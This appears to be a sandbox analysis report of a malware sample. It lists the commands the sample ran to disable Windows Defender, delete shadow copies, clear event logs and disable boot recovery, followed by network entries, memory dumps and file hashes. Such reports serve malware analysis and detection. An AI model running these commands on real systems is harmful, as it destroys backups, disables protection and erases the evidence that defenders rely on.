C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\vssadmin.exe
vssadmin.exe delete shadows /all /quiet
C:\Windows\SYSTEM32\wevtutil.exe
wevtutil.exe cl system
C:\Windows\SYSTEM32\wevtutil.exe
wevtutil.exe cl security
C:\Windows\SYSTEM32\wevtutil.exe
wevtutil.exe cl application
C:\Windows\System32\Wbem\wmic.exe
wmic.exe SHADOWCOPY /nointeractive
C:\Windows\System32\Wbem\wmic.exe
wmic.exe shadowcopy delete
C:\Windows\SYSTEM32\bcdedit.exe
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
C:\Windows\SYSTEM32\bcdedit.exe
bcdedit.exe /set {default} recoveryenabled no
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Program Files\Windows Defender\MpCmdRun.exe
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableRealtimeMonitoring $true
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | time.windows.com | udp |
| US | 168.61.215.74:123 | time.windows.com | udp |
Files
memory/2792-115-0x0000000000000000-mapping.dmp
memory/3944-116-0x0000000000000000-mapping.dmp
memory/2668-117-0x0000000000000000-mapping.dmp
memory/3668-118-0x0000000000000000-mapping.dmp
memory/4044-119-0x0000000000000000-mapping.dmp
memory/3096-120-0x0000000000000000-mapping.dmp
memory/940-121-0x0000000000000000-mapping.dmp
memory/2932-122-0x0000000000000000-mapping.dmp
memory/2232-123-0x0000000000000000-mapping.dmp
memory/4020-124-0x0000000000000000-mapping.dmp
memory/3992-125-0x0000000000000000-mapping.dmp
memory/4072-126-0x0000000000000000-mapping.dmp
memory/748-127-0x0000000000000000-mapping.dmp
memory/2804-128-0x0000000000000000-mapping.dmp
memory/3408-129-0x0000000000000000-mapping.dmp
memory/1188-130-0x0000000000000000-mapping.dmp
memory/668-131-0x0000000000000000-mapping.dmp
memory/428-132-0x0000000000000000-mapping.dmp
memory/1164-133-0x0000000000000000-mapping.dmp
memory/3320-134-0x0000000000000000-mapping.dmp
memory/828-135-0x0000000000000000-mapping.dmp
memory/1040-136-0x0000000000000000-mapping.dmp
memory/1268-137-0x0000000000000000-mapping.dmp
memory/1264-138-0x0000000000000000-mapping.dmp
memory/1432-139-0x0000000000000000-mapping.dmp
memory/1788-140-0x0000000000000000-mapping.dmp
memory/1976-141-0x0000000000000000-mapping.dmp
memory/1992-142-0x0000000000000000-mapping.dmp
memory/2224-143-0x0000000000000000-mapping.dmp
memory/504-144-0x0000000000000000-mapping.dmp
memory/3540-145-0x0000000000000000-mapping.dmp
memory/2208-146-0x0000000000000000-mapping.dmp
memory/1184-147-0x0000000000000000-mapping.dmp
memory/864-148-0x0000000000000000-mapping.dmp
memory/3212-149-0x0000000000000000-mapping.dmp
memory/860-150-0x0000000000000000-mapping.dmp
memory/616-151-0x0000000000000000-mapping.dmp
memory/1368-152-0x0000000000000000-mapping.dmp
memory/2752-153-0x0000000000000000-mapping.dmp
memory/3704-154-0x0000000000000000-mapping.dmp
memory/2220-155-0x0000000000000000-mapping.dmp
memory/636-156-0x0000000000000000-mapping.dmp
memory/3700-157-0x0000000000000000-mapping.dmp
memory/868-158-0x0000000000000000-mapping.dmp
memory/1516-159-0x0000000000000000-mapping.dmp
memory/3604-160-0x0000000000000000-mapping.dmp
memory/68-161-0x0000000000000000-mapping.dmp
memory/1028-162-0x0000000000000000-mapping.dmp
memory/1116-163-0x0000000000000000-mapping.dmp
memory/796-164-0x0000000000000000-mapping.dmp
memory/1736-165-0x0000000000000000-mapping.dmp
memory/3552-166-0x0000000000000000-mapping.dmp
memory/3916-167-0x0000000000000000-mapping.dmp
memory/1568-168-0x0000000000000000-mapping.dmp
memory/2344-169-0x0000000000000000-mapping.dmp
memory/2248-170-0x0000000000000000-mapping.dmp
memory/1728-171-0x0000000000000000-mapping.dmp
memory/2252-172-0x0000000000000000-mapping.dmp
memory/1868-173-0x0000000000000000-mapping.dmp
memory/1608-174-0x0000000000000000-mapping.dmp
memory/2992-175-0x0000000000000000-mapping.dmp
memory/3692-176-0x0000000000000000-mapping.dmp
memory/2268-177-0x0000000000000000-mapping.dmp
memory/1016-178-0x0000000000000000-mapping.dmp
memory/600-180-0x0000018894170000-0x0000018894172000-memory.dmp
memory/600-179-0x0000018894170000-0x0000018894172000-memory.dmp
memory/600-181-0x0000018894170000-0x0000018894172000-memory.dmp
memory/600-182-0x0000018894170000-0x0000018894172000-memory.dmp
memory/600-183-0x0000018894170000-0x0000018894172000-memory.dmp
memory/600-184-0x00000188AC940000-0x00000188AC962000-memory.dmp
memory/600-185-0x0000018894170000-0x0000018894172000-memory.dmp
memory/600-186-0x0000018894170000-0x0000018894172000-memory.dmp
memory/600-187-0x00000188AD380000-0x00000188AD3F6000-memory.dmp
memory/600-188-0x00000188AC900000-0x00000188AC902000-memory.dmp
memory/600-189-0x00000188AC903000-0x00000188AC905000-memory.dmp
memory/600-190-0x0000018894170000-0x0000018894172000-memory.dmp
memory/600-194-0x00000188AC906000-0x00000188AC908000-memory.dmp
memory/600-215-0x0000018894170000-0x0000018894172000-memory.dmp
memory/3740-217-0x000002D05D9B0000-0x000002D05D9B2000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | ad5cd538ca58cb28ede39c108acb5785 |
| SHA1 | 1ae910026f3dbe90ed025e9e96ead2b5399be877 |
| SHA256 | c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033 |
| SHA512 | c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13 |
memory/3740-218-0x000002D05D9B0000-0x000002D05D9B2000-memory.dmp
memory/3740-219-0x000002D05D9B0000-0x000002D05D9B2000-memory.dmp
memory/3740-220-0x000002D05D9B0000-0x000002D05D9B2000-memory.dmp
memory/3740-221-0x000002D05D9B0000-0x000002D05D9B2000-memory.dmp
memory/3740-222-0x000002D076990000-0x000002D0769B2000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | a5d084db334a6d26c301896f1a6192cd |
| SHA1 | e7473be98aed125bd83a7ae55a4ed233f81866b8 |
| SHA256 | 71d0b05798f08f29c416a206c1dca915cbe433f2ad9bbc5c9ef2e98c94717905 |
| SHA512 | 8a54338cb305692dc703c982eca8036ae686b6e457068339b94314158f4f84dd085a212871d5d557c95820aa47feada9c5fe3f3340ac1db77ca90f4444282fcb |
memory/3740-224-0x000002D05D9B0000-0x000002D05D9B2000-memory.dmp
memory/3740-225-0x000002D05D9B0000-0x000002D05D9B2000-memory.dmp
memory/3740-226-0x000002D076B40000-0x000002D076BB6000-memory.dmp
memory/3740-227-0x000002D05D9B0000-0x000002D05D9B2000-memory.dmp
memory/3740-231-0x000002D05D9B0000-0x000002D05D9B2000-memory.dmp
memory/3740-232-0x000002D05D9B0000-0x000002D05D9B2000-memory.dmp
memory/3740-253-0x000002D05DA60000-0x000002D05DA62000-memory.dmp
memory/3740-254-0x000002D05DA63000-0x000002D05DA65000-memory.dmp
memory/3740-255-0x000002D05DA66000-0x000002D05DA68000-memory.dmp
memory/600-252-0x00000188AC908000-0x00000188AC909000-memory.dmp
memory/3740-257-0x000002D05DA68000-0x000002D05DA69000-memory.dmp